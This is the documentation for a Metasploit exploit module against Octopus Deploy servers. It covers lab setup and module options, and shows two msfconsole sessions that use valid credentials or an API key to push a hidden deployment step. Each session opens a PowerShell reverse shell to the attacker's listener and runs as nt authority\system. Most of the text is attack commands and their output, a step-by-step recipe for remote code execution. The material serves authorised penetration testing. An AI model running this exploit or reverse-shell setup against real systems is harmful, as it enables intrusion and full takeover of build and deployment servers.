## Vulnerable Application

  [Install Octopus Deploy server](https://octopus.com/docs/getting-started#Gettingstarted-InstalltheOctopusserver)
  
  [Create a test user/team](https://octopus.com/docs/administration/managing-users-and-teams) - Team should have "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
  
  [Create an API key](https://octopus.com/docs/how-to/how-to-create-an-api-key)

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/windows/http/octopusdeploy_deploy```
  4. Do: set ```PATH```, ```RHOST```, ```RPORT```, and ```SSL``` if needed
  5. Do: set ```STEPNAME``` if desired
  6. Do: set ```USERNAME``` and ```PASSWORD``` or just ```APIKEY```
  7. Do: ```run```
  8. You should get a shell.

## Options

  **APIKEY**

  API key, which can be generated within the Octopus Deploy application. Can be used instead of a username/password combination.

  **USERNAME**

  Username of the Octopus Deploy user.

  **PASSWORD**

  Password of the Octopus Deploy user.

  **PATH**

  Path to the Octopus Deploy instance. For example, if you sign in to "https://example.com/octopus/app", the value should be "/octopus".

  **STEPNAME**

  Name of the step to be added to a deployment. This may be visible in the application for a short period of time. A random value will be generated if no value is provided.

  **SSL**

  Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.
## Scenarios

### Octopus Deploy Server 3.16.0

  Getting a privileged shell on Octopus Deploy server using administrative credentials.

  ```
  msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set USERNAME ODUser
USERNAME => ODUser
msf exploit(octopusdeploy_deploy) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step r4XAJc to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.2
[*] Creating release
[*] Release Releases-79 created
[*] Deploying TestProject2 version 0.0.2 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step r4XAJc from TestProject2
[*] Step r4XAJc deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59346) at 2017-05-15 19:54:01 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025358-22>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025358-22> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) >
  ```

  Getting a privileged shell on Octopus Deploy server using a sufficiently privileged API key.

  ```
  msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > set APIKEY API-FCIQ773M43RKNC4I9KZHQTABC
APIKEY => API-FCIQ773M43RKNC4I9KZHQTABC
msf exploit(octopusdeploy_deploy) > set STEPNAME shell
STEPNAME => shell
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step shell to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-80 created
[*] Deploying TestProject2 version 0.0.3 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step shell from TestProject2
[*] Step shell deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59373) at 2017-05-15 19:59:55 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025952-24>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025952-24> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) > 
  ```